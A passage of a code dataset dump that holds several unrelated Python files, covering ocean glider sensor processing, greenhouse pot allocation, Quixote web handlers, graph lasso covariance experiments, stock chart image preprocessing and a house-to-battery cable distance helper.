deep median or deep mean to determine bad profiles\n\n return_figure return a figure object that shows the before and after\n verbose will print the progress of the processing\n\n OUTPUT\n ------\n baseline uncorrected, but despiked fluorescence\n quench_corrected quench corrected fluorescence\n quench_layer the quenching layer as a mask\n figs figures reporting the despiking and quenching correction\n \"\"\"\n\n from numpy import array, nan, count_nonzero, unique\n from . import optics as op\n from .cleaning import despike, despiking_report\n\n flr_raw = array(flr_raw)\n bbp = array(bbp)\n par = array(par)\n dives = array(dives)\n depth = array(depth)\n time = array(time)\n lat = array(lat)\n lon = array(lon)\n ref_depth = profiles_ref_depth\n stdev_multiplier = deep_multiplier\n method = deep_method\n\n dive_count = count_nonzero(unique(dives))\n\n if verbose:\n print('\\n' + '=' * 50 + '\\nFluorescence\\n\\tMask bad profiles based on deep values (ref depth={}m)'.format(ref_depth))\n bad_profiles = op.find_bad_profiles(dives, depth, flr_raw, ref_depth, stdev_multiplier, method)\n flr_raw[bad_profiles[0]] = nan\n\n bad_count = count_nonzero(bad_profiles[1])\n\n if verbose:\n print('\\tNumber of bad profiles = {}/{}'.format(bad_count, dive_count))\n\n if verbose:\n print('\\tDark count correction')\n\n flr_raw -= dark_count\n flr_dark = op.fluorescence_dark_count(flr_raw, depth)\n flr_dark[flr_dark < 0] = nan\n\n baseline, spikes = despike(flr_dark, spike_window, spike_method='median')\n\n if par is not None:\n if verbose:\n print('\\tCalculating the photic depth from PAR')\n photic_layer = op.photic_depth(par, dives, depth, return_mask=True)[0]\n else:\n photic_layer = None\n\n if verbose:\n print('\\tQuenching correction')\n quench_corrected, quench_layer = op.quenching_correction(\n baseline, bbp, dives, depth, time, lat, lon,\n photic_layer=photic_layer,\n quenching_layer=quenching_layer,\n sunrise_sunset_offset=1,\n night_day_group=True)\n\n if verbose:\n print(\"\\tSpike identification (spike window={})\".format(spike_window))\n\n if return_figure:\n if verbose:\n print('\\tGenerating figures for despiking and quenching report')\n figs = despiking_report(dives, depth, flr_raw, baseline.data, spikes, name='Fluorescence'),\n figs += op.quenching_report(baseline.data, quench_corrected.data, quench_layer, dives, depth),\n return baseline, quench_corrected, quench_layer, figs\n else:\n return baseline, quench_corrected, quench_layer\n\n\ndef calc_par(par_raw, dives, depth, time, scale_factor_wet_uEm2s, sensor_output_mV, replace_surface_depth=2, curve_max_depth=80, verbose=True):\n \"\"\"\n INFORMATION\n -----------\n Calculates the theoretical PAR based on an exponential curve fit.\n\n The processing steps are:\n 1. par_scaling (factory cal sheet scaling)\n 2. par_dark_count (correct deep par values to 0 using 5th %)\n 3. par_fill_surface (return the theoretical curve of par based exponential fit)\n\n INPUT\n -----\n All inputs must be ungridded np.ndarray or pd.Series data\n par_raw raw PAR\n dives the dive count (round is down dives, 0.5 up dives)\n depth in metres\n time as a np.datetime64 array\n \"\"\"\n\n from numpy import array\n from . import optics as op\n\n par_raw = array(par_raw)\n dives = array(dives)\n depth = array(depth)\n time = array(time)\n\n if verbose:\n print('\\n' + '=' * 50 + '\\nPAR\\n\\tDark correction')\n\n # dark correction for par\n par_scaled = op.par_scaling(par_raw, scale_factor_wet_uEm2s, sensor_output_mV)\n par_dark = op.par_dark_count(par_scaled, dives, depth, time)\n if verbose:\n print('\\tFitting exponential curve to data')\n par_filled = op.par_fill_surface(par_dark, dives, depth, max_curve_depth=curve_max_depth)\n par_filled[par_filled < 0] = 0\n\n photic_depth = op.photic_depth(par_filled, dives, depth, ref_percentage=1, return_mask=False)\n\n return par_filled, photic_depth\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"buoyancy_glider_utils/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":17908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481362734","text":"def experimental_objects_allocation(n_row, n_col, light_effect, temperature_effect, light_weight, temperature_weight, genotype_num, replicate_num, energy_weight, distance_weight, output_path):\n \n from random import sample\n import time\n import pandas as pd\n import numpy as np\n\n spatial_light_effect = np.zeros((n_row,n_col))\n \n for i, col in enumerate(spatial_light_effect):\n for j, col in enumerate(spatial_light_effect.T):\n\n spatial_light_effect[i,:] = np.exp(i**light_effect)\n \n spatial_light_effect_norm = spatial_light_effect/spatial_light_effect.sum()\n \n \n \n spatial_temperature_effect = np.zeros((n_row,n_col))\n\n for i, row in enumerate(spatial_temperature_effect):\n for j, col in enumerate(spatial_temperature_effect.T):\n\n spatial_temperature_effect[i,j] = np.exp(i**(temperature_effect))+np.exp(j**(temperature_effect))\n\n spatial_temperature_effect_norm = spatial_temperature_effect/spatial_temperature_effect.sum() \n\n #Combine light and temperature effect as environmenatl effect\n spatial_enviromental_effect = light_weight*spatial_light_effect + temperature_weight*spatial_temperature_effect\n spatial_enviromental_effect_norm = spatial_enviromental_effect/spatial_enviromental_effect.sum()\n \n #Find not convenient locations -> with highest enviromental effect (We know that there is 45 free positions)\n\n position_allocation = np.zeros((n_row,n_col))\n\n def largest_indices(ary, n):\n \"\"\"Returns the n largest indices from a numpy array.\"\"\"\n flat = ary.flatten()\n indices = np.argpartition(flat, -n)[-n:]\n indices = indices[np.argsort(-flat[indices])]\n\n return np.unravel_index(indices, ary.shape)\n \n\n #Find X-most effected spots\n coords = largest_indices(spatial_enviromental_effect, n_row*n_col - genotype_num*replicate_num)\n #and permit them for alocation\n position_allocation[coords] = None\n\n #Compute spot energy if enviromental conditions would be equivalent for whole are\n energy_equi = spatial_enviromental_effect_norm[np.where(position_allocation == 0)].sum() / np.where(position_allocation == 0)[0].shape[0]\n\n #define triplet energy vector\n energy_triplet = np.array((energy_equi,energy_equi,energy_equi))\n\n\n genotypes = list(range(1,genotype_num+1))\n \n class pair_allocation():\n \n def __init__(self, crit, position_1, position_2):\n\n self.crit = crit\n self.position_1 = position_1\n self.position_2 = position_2\n \n \n while genotypes:\n \n #randomly select genotype\n gen = sample(genotypes,1)\n gen = gen[0]\n\n #remove genotype from a list of genotypes\n genotypes.remove(gen) \n\n #free positions\n free_coords = np.where(position_allocation == 0)\n\n #randomly select spot for first replicate\n index = sample(range(0,free_coords[0].shape[0]),1)\n\n #position coords\n first_position = (free_coords[0][index],free_coords[1][index]) \n\n position_allocation[first_position[0], first_position[1]] = gen\n\n #Enviromental energy on position of first alocated replicate\n first_energy = spatial_enviromental_effect_norm[first_position[0],first_position[1]]\n\n #free positions\n free_coords = np.where(position_allocation == 0)\n\n evaluated_pairs = []\n\n for i in range(0,free_coords[0].shape[0]):\n\n for j in range(0,free_coords[0].shape[0]):\n\n if(not i==j): \n\n second_position = (free_coords[0][i],free_coords[1][i]) \n third_position = (free_coords[0][j],free_coords[1][j])\n\n second_energy = spatial_enviromental_effect_norm[second_position[0],second_position[1]] \n third_energy = spatial_enviromental_effect_norm[third_position[0],third_position[1]] \n\n\n energy_crit = 1/(abs(energy_triplet.sum()-first_energy-second_energy-third_energy))\n\n distance_crit = (((first_position[0]-second_position[0])**2 + (first_position[1]-second_position[1])**2)**(0.5))+(((first_position[0]-third_position[0])**2 + (first_position[1]-third_position[1])**2)**(0.5))+(((third_position[0]-second_position[0])**2 + (third_position[1]-second_position[1])**2)**(0.5))\n\n evaluated_pair = pair_allocation(energy_weight*energy_crit+distance_weight*distance_crit,second_position,third_position)\n evaluated_pairs.append(evaluated_pair)\n\n\n evaluated_pairs_sorted = sorted(evaluated_pairs, key=lambda pair: pair.crit, reverse = True)\n\n position_allocation[evaluated_pairs_sorted[0].position_1[0],evaluated_pairs_sorted[0].position_1[1]] = gen\n position_allocation[evaluated_pairs_sorted[0].position_2[0],evaluated_pairs_sorted[0].position_2[1]] = gen\n\n\n\n ## convert your array into a dataframe\n df = pd.DataFrame(position_allocation)\n\n ## save to xlsx file\n\n df.to_excel(output_path + 'genotypes_spatial_distribution.xlsx', index=True)","sub_path":"greenhouse_pot_allocation.py","file_name":"greenhouse_pot_allocation.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591428991","text":"# coding: utf-8\nimport quixote\nfrom quixote.directory import Directory\n\ntry:\n from html import escape ## Py3\nexcept ImportError:\n from cgi import escape ## Py2\n\n#/\nclass Main_H(Directory):\n ## |H| means request handler.\n\n _q_exports = ['']\n\n def _q_index(self, *args, **kwargs):\n #/\n line_s = []\n\n #/\n line_s.append('#/ Quixote')\n line_s.append('Main_H._q_index: {} {}'.format(args, kwargs))\n\n #/\n line_s.append('\\n#/ quixote.get_request().environ')\n for key, val in sorted(quixote.get_request().environ.copy().items(), key=lambda x: x[0]):\n line_s.append('{:40}{}'.format(key, val))\n\n #/\n line_s.append('\\n#/ globals()')\n for key, val in sorted(globals().copy().items(), key=lambda x: x[0]):\n if key != '__builtins__':\n line_s.append('{:40}{:50}{}'.format(key, str(type(val)), str(val)))\n\n #/\n txt = '\\n'.join(line_s)\n txt = escape(txt, quote=True)\n\n txt = \\\n\"\"\"\n\n\n\n\n\n
%s
\n\n\n\"\"\" % (txt,)\n\n return txt\n\nclass Next_H(Directory):\n ## |H| means request handler.\n\n _q_exports = ['']\n\n def _q_index(self):\n url_path = quixote.get_request().get_path()\n\n url_qs = quixote.get_request().get_query()\n\n txt = 'Quixote: |{}{}|'.format(url_path, '?'+url_qs if url_qs else '')\n\n return txt\n","sub_path":"src/aoikquixotestart/hdlrs.py","file_name":"hdlrs.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117927705","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport covariance_learn\nimport itertools\nimport phase_transition\nimport htree\nimport joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.linalg\nimport scipy.special\nfrom functools import partial\nfrom sklearn.utils import check_random_state\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom joblib import Parallel, delayed\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\ndef alpha_func_(h, max_level):\n return partial(covariance_learn._alpha_func, h=h, max_level=max_level)\n\n\ndef cov2corr(cov):\n return np.diag(1 / np.sqrt(np.diag(cov))).dot(\n cov.dot(np.diag(1 / np.sqrt(np.diag(cov)))))\n\n\ndef estimate_precision(alpha, h=None, method='hgl', max_level=None,\n title=None):\n if max_level is None:\n max_level = max([lev for (_, lev) in tree.root_.get_descendants()])\n alpha_func = alpha_func_(h=h, max_level=max_level)\n if method == 'gl':\n covl = covariance_learn.GraphLasso(alpha=alpha, score_norm='KL',\n max_iter=1e4, rho=2)\n elif method == 'hgl':\n covl = covariance_learn.HierarchicalGraphLasso(alpha=alpha, htree=tree,\n alpha_func=alpha_func,\n score_norm='KL',\n max_iter=1e4, rho=2)\n covl.fit(X)\n K = covl.precision_\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.matshow(np.ma.masked_equal(K * (covl.auxiliary_prec_ != 0), 0),\n cmap=plt.cm.RdBu_r, vmin=-np.max(np.abs(K)) / 5.,\n vmax=np.max(np.abs(K)) / 5.)\n ax1.set_title('Estimated precision')\n ax1.set_axis_bgcolor('.7')\n ax2.matshow(np.array(covl.auxiliary_prec_ != 0, dtype=float),\n cmap=plt.cm.gray, vmin=0, vmax=1)\n ax2.set_title('Support (derived from split variable)')\n fig.suptitle(title)\n fig, ax = plt.subplots()\n plt.plot(covl.f_vals_, 'b-')\n plt.title(\"Jensen's divergence = {}\".format(covl.score(Y)))\n ax.set_ylabel('energy', color='b')\n for tl in ax.get_yticklabels():\n tl.set_color('b')\n ax2 = ax.twinx()\n ax2.semilogy(covl.var_gap_, 'g-')\n ax2.semilogy(covl.dual_gap_, 'g--')\n ax2.set_ylabel('split diff & dual update norm', color='g')\n for tl in ax2.get_yticklabels():\n tl.set_color('g')\n fig.suptitle(title)\n plt.show()\n\n\ndef grid_evaluation(X, Y, n_h=11, n_a=11):\n h_vals = np.linspace(0., 1., n_h)\n h_ix = np.arange(n_h)\n alpha_vals = np.logspace(-3., 0., n_a)\n a_ix = np.arange(n_a)\n scores = {'KL': np.zeros((n_h, n_a)), 'ell0': np.zeros((n_h, n_a))}\n score_gl = {'KL': np.zeros((n_h, n_a)), 'ell0': np.zeros((n_h, n_a))}\n\n alpha_star = {'hgl': dict(), 'gl': dict()}\n h_star = {'hgl': dict(), 'gl': dict()}\n\n for (ix, vals) in zip(itertools.product(h_ix, a_ix),\n itertools.product(h_vals, alpha_vals)):\n for score_norm in {'KL', 'ell0'}:\n if ix[0] == 0:\n covl = covariance_learn.GraphLasso(\n alpha=vals[1], score_norm=score_norm, max_iter=1e4,\n rho=2.)\n score_gl[score_norm][..., ix[1]] = covl.fit(X).score(Y)\n covl = covariance_learn.HierarchicalGraphLasso(\n alpha=vals[1], htree=tree,\n alpha_func=alpha_func_(h=vals[0], max_level=max_level),\n score_norm=score_norm, max_iter=1e4, rho=2.)\n scores[score_norm][ix] = covl.fit(X).score(Y)\n\n X_, Y_ = np.meshgrid(h_vals, alpha_vals)\n for score in scores.keys():\n alpha_star['hgl'][score] = Y_.flat[np.argmin(scores[score].T)]\n h_star['hgl'][score] = X_.flat[np.argmin(scores[score].T)]\n arg_min_alpha = np.argmin(score_gl[score][0, ...])\n arg_min_h = np.argmin(scores[score][arg_min_alpha, ...])\n h_star['gl'][score] = h_vals[arg_min_h]\n alpha_star['gl'][score] = alpha_vals[arg_min_alpha]\n return scores, score_gl, alpha_star, h_star\n\n\ndef plot_grid(scores=None, score_gl=None, score='KL', transpose=True,\n zlims=None, z_offset=None, y_offset=None, x_offset=None,\n print_title=False, invert_x=False, invert_y=False, fsize=18):\n fig = plt.figure()\n if scores is not None and score_gl is not None:\n if score == 'KL':\n plot_scores = np.log(scores[score] / score_gl[score])\n title = \"log-difference of Jensen's divergence:\" +\\\n \"log J(hgl) - log J(gl)\"\n score_title = 'Jmin'\n elif score == 'ell0':\n plot_scores = scores[score] - score_gl[score]\n title = \"support mismatch difference: ell0(hgl) - ell0(gl)\"\n score_title = 'ell0min'\n elif scores is not None or score_gl is not None:\n if scores is not None:\n title = \"[HGL] \"\n plot_scores = scores[score]\n else:\n title = \"[GL] \"\n plot_scores = score_gl[score]\n if score == 'KL':\n title += \"Jensen's divergence\"\n score_title = \"Jmin\"\n elif score == 'ell0':\n title += \"support mismatch\"\n score_title = \"ell0min\"\n else:\n raise ValueError('Neither scores, nor score_gl are defined: ' +\n 'nothing to plot')\n\n h_vals = np.linspace(0., 1., plot_scores.shape[0])\n alpha_vals = np.logspace(-3., 0., plot_scores.shape[1])\n X_, Y_ = np.meshgrid(h_vals, alpha_vals)\n\n if transpose:\n plot_scores = plot_scores.T\n xlabel = 'h'\n ylabel = r'$\\lambda$'\n else:\n ylabel = 'h'\n xlabel = r'$\\lambda$'\n\n if invert_x:\n plot_scores = plot_scores[::-1, ...]\n X_ = X_[::-1, ...]\n Y_ = Y_[::-1, ...]\n if invert_y:\n plot_scores = plot_scores[..., ::-1]\n Y_ = Y_[..., ::-1]\n X_ = X_[..., ::-1]\n\n ax = fig.gca(projection='3d')\n ax.plot_surface(X_, Y_, plot_scores, rstride=1, cstride=1,\n cmap=plt.cm.coolwarm, linewidth=0, antialiased=False)\n if x_offset is None:\n x_offset = ax.get_xlim()[1]\n if y_offset is None:\n y_offset = ax.get_ylim()[0]\n if z_offset is None:\n z_offset = ax.get_zlim()[0]\n ax.contour(X_, Y_, plot_scores, zdir='z', offset=z_offset,\n cmap=plt.cm.coolwarm)\n ax.contour(X_, Y_, plot_scores, zdir='x', offset=x_offset,\n cmap=plt.cm.coolwarm)\n ax.contour(X_, Y_, plot_scores, zdir='y', offset=y_offset,\n cmap=plt.cm.coolwarm)\n if zlims is not None:\n ax.set_zlim(zlims)\n ax.set_xlabel(xlabel, fontsize=fsize)\n ax.set_ylabel(ylabel, fontsize=fsize)\n if print_title:\n ax.set_zlabel(title, fontsize=fsize)\n if print_title and scores is not None and score_gl is not None:\n ax.set_title(score_title + '(hgl: lambda={}, h={}) = {}, '.format(\n Y_.flat[np.argmin(scores[score].T)],\n X_.flat[np.argmin(scores[score].T)],\n np.min(scores[score])) +\n score_title + '(gl: lambda={}) = {}'.format(\n Y_.flat[np.argmin(score_gl[score].T)],\n np.min(score_gl[score])))\n elif print_title and scores is not None:\n ax.set_title(score_title + '(hgl: lambda={}, h={}) = {}'.format(\n Y_.flat[np.argmin(scores[score].T)],\n X_.flat[np.argmin(scores[score].T)],\n np.min(scores[score])))\n elif print_title and score_gl is not None:\n ax.set_title(score_title + '(gl: lambda={}) = {}'.format(\n Y_.flat[np.argmin(score_gl[score].T)],\n np.min(score_gl[score])))\n plt.show()\n\n\ndef plot_covariances(X, Theta, Y=None):\n if Y is None:\n eigvals, eigvecs = scipy.linalg.eigh(Theta)\n Y = eigvecs.dot(np.diag(1 / np.sqrt(eigvals))).dot(eigvecs.T)\n plt.figure()\n plt.subplot(221)\n plt.matshow(Theta, cmap=plt.cm.RdBu_r, fignum=False)\n plt.clim((-1, 1))\n plt.title('population precision matrix')\n plt.colorbar()\n\n plt.subplot(222)\n sample_prec = scipy.linalg.inv(cov2corr(X.T.dot(X)))\n plt.matshow(sample_prec, cmap=plt.cm.RdBu_r,\n fignum=False)\n max_plot = np.max(np.abs(sample_prec)) / 5.\n plt.clim((-max_plot, max_plot))\n plt.title('sample (n={}) precision matrix'.format(X.shape[0]))\n plt.colorbar()\n\n plt.subplot(223)\n plt.matshow(cov2corr(Y.T.dot(Y)), cmap=plt.cm.RdBu_r, fignum=False)\n plt.clim((-1, 1))\n plt.title('population correlation matrix')\n plt.colorbar()\n\n plt.subplot(224)\n plt.matshow(cov2corr(X.T.dot(X)), cmap=plt.cm.RdBu_r, fignum=False)\n plt.clim((-1, 1))\n plt.title('sample correlation matrix')\n plt.colorbar()\n plt.show()\n\n\ndef plot_covariance(cov, scaled=True, aux=None, diag=True, grid=True):\n cov_ = cov.copy()\n if scaled:\n from covariance_learn import _cov_2_corr as cov2corr\n cov_ = cov2corr(cov_)\n if not diag:\n cov_.flat[::cov_.shape[0] + 1] = 0.\n plt.figure()\n ax = plt.gca()\n if aux is None:\n aux = np.ones(cov_.shape)\n im = plt.matshow(np.ma.masked_equal(aux, 0) * cov_, cmap=plt.cm.RdBu_r,\n fignum=False)\n ax.set_axis_bgcolor('.4')\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n divider = make_axes_locatable(ax)\n if cov_.shape[0] == 16 and grid:\n for k in np.arange(4 - 1):\n plt.plot([-.5, 15.5], [4 * (k + 1) - .5, 4 * (k + 1) - .5],\n linewidth=2, color='black')\n plt.plot([4 * (k + 1) - .5, 4 * (k + 1) - .5], [-.5, 15.5],\n linewidth=2, color='black')\n plt.xlim((-.5, 15.5))\n plt.ylim((15.5, -.5))\n elif cov_.shape[0] == 512 and grid:\n for k in np.arange(64 - 1):\n plt.plot([-.5, 512.5], [8 * (k + 1) - .5, 8 * (k + 1) - .5],\n linewidth=1 + int(not((k + 1) % 8)), color='black')\n plt.plot([8 * (k + 1) - .5, 8 * (k + 1) - .5], [-.5, 512.5],\n linewidth=1 + int(not((k + 1) % 8)), color='black')\n plt.xlim((-.5, 512.5))\n plt.ylim((512.5, -.5))\n m = np.max(np.abs(cov_))\n plt.clim((-m, m))\n cax = divider.append_axes('right', size='5%', pad=.05)\n cb = plt.colorbar(im, cax=cax)\n cb.ax.tick_params(labelsize=18)\n\n\ndef plot_profiles(alpha=1., h=.8, max_level=4, levels=None):\n if levels is None:\n levels = np.arange(1, max_level + 1)\n plt.figure()\n plt.plot(levels, covariance_learn._alpha_func(alpha=alpha, lev=levels, h=h,\n max_level=max_level))\n plt.show()\n\n\ndef lambda_path(n_samples, C, tree):\n n_bootstraps = 10\n X = np.random.normal(size=(np.max(n_samples) * n_bootstraps, C.shape[1]))\n results = Parallel(n_jobs=min(len(n_samples), 20))(\n delayed(covariance_learn.cross_val)(\n X, method='hgl', n_iter=n_bootstraps,\n train_size=np.float(n) / (np.max(n_samples) * n_bootstraps),\n model_prec=Theta, optim_h=True, htree=tree)\n for n in n_samples)\n alpha_opt_, LL_, h_opt_ = zip(*results)\n return alpha_opt_, h_opt_\n\n\ndef init(random_state=None, a=-.4, b=.28, n_samples=16):\n if random_state is None:\n random_state = np.random.randint(2 ** 31 - 1)\n random_state = check_random_state(random_state)\n\n tree = htree.construct_tree(arity=4, depth=2)\n\n # Create sample\n Theta = phase_transition._get_mx(a, b, mx_type='smith')\n X = random_state.normal(size=(n_samples, Theta.shape[0]))\n\n return tree, X, Theta\n\n\ndef get_max_level(tree):\n return max([lev for (_, lev) in tree.root_.get_descendants()])\n\n\nif __name__ == \"__main__\":\n tree, X, Theta = init()\n max_level = get_max_level(tree)\n\n eigvals, eigvecs = scipy.linalg.eigh(Theta)\n C = np.diag(1 / np.sqrt(eigvals)).dot(eigvecs.T)\n\n X = X.dot(C)\n Y = C\n\n scores, score_gl, alpha_star, h_star = grid_evaluation(\n X, Y, n_a=21, n_h=21)\n\n n_samples = np.logspace(1., 3., 9)\n alpha_opt_, h_opt_ = lambda_path(n_samples, C, tree)\n\n joblib.dump({'scores': scores,\n 'score_gl': score_gl,\n 'alpha_star': alpha_star,\n 'h_star': h_star,\n 'n_samples': n_samples,\n 'alpha_opt_': alpha_opt_,\n 'h_opt_': h_opt_},\n 'results_.pkl')\n raise StopIteration\n plot_covariances(X, Theta, Y)\n\n estimate_precision(alpha=alpha_star['hgl']['KL'], h=h_star['hgl']['KL'],\n method='hgl',\n title=r'($\\lambda^{*}_{hgl}$, $h^{\\star}_{hgl}$)')\n estimate_precision(\n alpha=alpha_star['gl']['KL'], h=h_star['gl']['KL'], method='hgl',\n title=r'($\\lambda^{*}_{gl}, h^{\\star}_{hgl}|_{\\lambda^{\\star}_{gl}}$)')\n estimate_precision(alpha=alpha_star['hgl']['KL'], method='gl',\n title=r'($\\lambda^{*}_{hgl}$, 0)')\n estimate_precision(alpha=alpha_star['gl']['KL'], method='gl',\n title=r'($\\lambda^{*}_{gl}$, 0)')\n\n plot_grid(scores=scores, score='KL', transpose=True)\n plot_grid(scores=scores, score_gl=score_gl, score='KL', transpose=True)\n\n plot_grid(scores=scores, score='ell0', transpose=True)\n plot_grid(scores=scores, score_gl=score_gl, score='ell0', transpose=True)","sub_path":"figure_generator.py","file_name":"figure_generator.py","file_ext":"py","file_size_in_byte":13337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228579617","text":"import os\nimport pandas as pd\nimport numpy as np\nimport preprocessing\nimport clustering\nimport classes\nimport metrics as mt\nimport time\n\nfrom helper import *\n\ndef get_train_data(stock_names, read_path=\"../sanity_input/train/images_with_labels\", labels_are_last=1, save_path=\"../sanity_input/train/last_saved_data\"):\n \n if os.path.isfile(save_path+\"/last_saved.pickle\"):\n return pd.read_pickle(save_path+\"/last_saved.pickle\")\n \n all_train_images = []\n all_train_labels = []\n all_train_names = []\n all_train_dates=[]\n\n # todo: burada şu string colomn işini çöz\n for stock in stock_names:\n data_df = pd.read_csv(read_path + \"/{}.csv\".format(stock), header=None)\n names = data_df.iloc[:, 0] # first element\n dates = data_df.iloc[:, 1] # second element\n images = data_df.iloc[:, 2:-labels_are_last] # remaining elements\n labels = data_df.iloc[:, -labels_are_last:] # last elements\n\n print(\"all images are merging with {} ...\".format(stock))\n\n # determine where to split\n train_image_count = images.shape[0]\n\n # split train and test\n # for 16 year of data : nearly 14 year train-last 2 year test\n train_images = images.iloc[0:train_image_count]\n train_labels = labels.iloc[0:train_image_count]\n train_names = names.iloc[0:train_image_count]\n train_dates = dates.iloc[0:train_image_count]\n\n # todo: need to make data class because above not seems good. -ugurgudelek\n\n if len(all_train_images) == 0:\n all_train_images = np.array(train_images)\n all_train_labels = train_labels.values\n all_train_names = np.array(train_names)\n all_train_dates = np.array(train_dates)\n else:\n all_train_images = np.append(all_train_images, train_images, axis=0)\n all_train_labels = np.append(all_train_labels, train_labels.values, axis=0)\n all_train_names = np.append(all_train_names,train_names, axis=0)\n all_train_dates = np.append(all_train_dates,train_dates, axis=0)\n\n print(\"current train shape is {} and {} label \".format(pd.DataFrame(all_train_images).shape,\n all_train_labels.shape[1]))\n \n print(\"Sorting train data by date and name...\")\n sorted_train_data = pd.DataFrame()\n sorted_train_data['date'] = all_train_dates\n sorted_train_data['name'] = all_train_names\n sorted_train_data['image'] = [i for i in all_train_images]\n sorted_train_data['label'] = all_train_labels\n sorted_train_data = sorted_train_data.sort_values(by = ['date', 'name'])\n \n data = {'train_images': pd.DataFrame(np.asarray([i for i in sorted_train_data['image']])),\n 'train_labels': pd.DataFrame(sorted_train_data['label'].values),\n 'train_names': pd.DataFrame(sorted_train_data['name'].values),\n 'train_dates': pd.DataFrame(sorted_train_data['date'].values)\n } \n\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n pd.to_pickle(data, save_path+\"/last_saved.pickle\")\n\n return data\n\ndef fast_normalize_and_calculate_metrics(train_stock, fresh_stock):\n train_stock.loc[:,'name'] = [''] * train_stock.shape[0]\n train_stock.loc[:,'pct_change_tanh'] = [0.0] * train_stock.shape[0]\n\n stock = train_stock.append(fresh_stock, ignore_index=True).drop(['name', 'pct_change_tanh'], axis=1)\n\n # create data arr to hold all metric info\n metric_data, metric_function_names = preprocessing.calculate_metrics(stock)\n\n # assign nan value beginning of the data\n metric_data = assign_null_into_data(arr=metric_data, length=len(stock['adjusted_close']))\n\n # append data and metrics column-wise\n stock = stack_data_and_metrics(stock, metric_data, metric_function_names)\n\n # normalize price values before applying labels\n # because we need to get rid of diversity among stocks\n stock = preprocessing.apply_normalization_to_raw_data(stock)\n\n return stock.iloc[-1]\n\n\ndef fast_get_last_image(train_stock_with_metrics, split_period=28):\n\n\n predictor_names = pd.read_csv(\"../sanity_new/clustered_names.csv\", header=None,\n squeeze=True).values.tolist()\n\n # drop nan values for proper set\n train_stock_with_metrics = train_stock_with_metrics.dropna()\n\n # drop irrelevant features\n stock_with_metrics = train_stock_with_metrics[['date'] + predictor_names]\n # when i do this, later i can reach data with stock name and date\n\n image_col_size = stock_with_metrics[predictor_names].shape[1]\n image_row_size = split_period\n\n if image_row_size != image_col_size:\n raise Exception(\"image matrix must be square!\")\n\n # lower = num_records - split_period\n # upper = lower + split_period\n\n image = stock_with_metrics[predictor_names].iloc[-split_period:]\n date = stock_with_metrics['date'].iloc[-split_period:]\n\n # normalization for image.\n image = (image - image.mean()) / image.std()\n image_flat = image.values.flatten() # image_flat'shape : image_row_size * image_col_size\n\n return date, image_flat\n\n\ndef normalize_and_calculate_metrics(stock_name, raw_data_path=\"../sanity_input/train/raw_data\", stock_with_metrics_path = \"../sanity_input/train/stock_with_metrics\"):\n \n # read stock csv\n stock = pd.read_csv(raw_data_path + \"/{}.csv\".format(stock_name))\n\n # read the stock_with_metrics csv\n stock_with_metrics = pd.read_csv(stock_with_metrics_path + \"/{}.csv\".format(stock_name))\n\n # get the last 100 records\n num_records = stock.shape[0]\n stock = stock.iloc[num_records - 100 : num_records]\n num_records = stock_with_metrics.shape[0]\n stock_with_metrics = stock_with_metrics.iloc[num_records - 100 : num_records]\n \n # create data arr to hold all metric info\n metric_data, metric_function_names = preprocessing.calculate_metrics(stock)\n \n # assign nan value beginning of the data\n metric_data = assign_null_into_data(arr=metric_data, length=len(stock['adjusted_close']))\n \n # append data and metrics column-wise\n stock = stack_data_and_metrics(stock, metric_data, metric_function_names)\n \n # normalize price values before applying labels\n # because we need to get rid of diversity among stocks\n stock = preprocessing.apply_normalization_to_raw_data(stock)\n\n # get only the fresh data\n fresh_stock_with_metrics = stock[stock.date.isin(stock_with_metrics.date) == False]\n \n return fresh_stock_with_metrics\n\ndef get_last_image(stock_name, split_period=28,\n stock_with_metrics_path=\"../sanity_input/train/stock_with_metrics\"):\n\n # read stock_with_metrics\n stock_with_metrics = pd.read_csv(stock_with_metrics_path + \"/{}.csv\".format(stock_name))\n\n # get the last 100 records\n # num_records = stock_with_metrics.shape[0]\n # stock_with_metrics = stock_with_metrics.iloc[num_records - 100 : num_records]\n\n predictor_names = pd.read_csv(\"../sanity_input/train/clustered_names.csv\", header=None, squeeze=True).values.tolist()\n\n # drop nan values for proper set\n stock_with_metrics = stock_with_metrics.dropna()\n\n # drop irrelevant features\n stock_with_metrics = stock_with_metrics[['date'] + predictor_names]\n # when i do this, later i can reach data with stock name and date\n \n\n \n image_col_size = stock_with_metrics[predictor_names].shape[1]\n image_row_size = split_period\n \n if image_row_size != image_col_size:\n raise Exception(\"image matrix must be square!\")\n\n # lower = num_records - split_period\n # upper = lower + split_period\n \n image = stock_with_metrics[predictor_names].iloc[-split_period:]\n date = stock_with_metrics['date'].iloc[-split_period:]\n\n # normalization for image.\n image = (image - image.mean()) / image.std()\n image_flat = image.values.flatten() # image_flat'shape : image_row_size * image_col_size\n \n return date, image_flat\n","sub_path":"src/old code base/obsolete code/src/sanity_preprocessing.py","file_name":"sanity_preprocessing.py","file_ext":"py","file_size_in_byte":7993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385371396","text":"from operator import itemgetter\n\n# find the distance between a house and a battery \ndef find_distance(house, battery):\n \n #derermine horizontal and vertical distance \n horizontal_distance = int(house.x_coordinate) - int(battery.x_coordinate)\n vertical_distance = int(house.y_coordinate) - int(battery.y_coordinate)\n \n # get only the absolute distance regardless of direction \n if horizontal_distance < 0:\n horizontal_distance *= -1\n \n if vertical_distance < 0:\n vertical_distance *= -1 \n\n # return total distance \n return horizontal_distance + vertical_distance\n\n# get the coordenates of a cable between a house and a battery \ndef create_cable(house, battery):\n # set coordinates to ints \n battery_c = [int(battery.x_coordinate),int(battery.y_coordinate)]\n house_c = 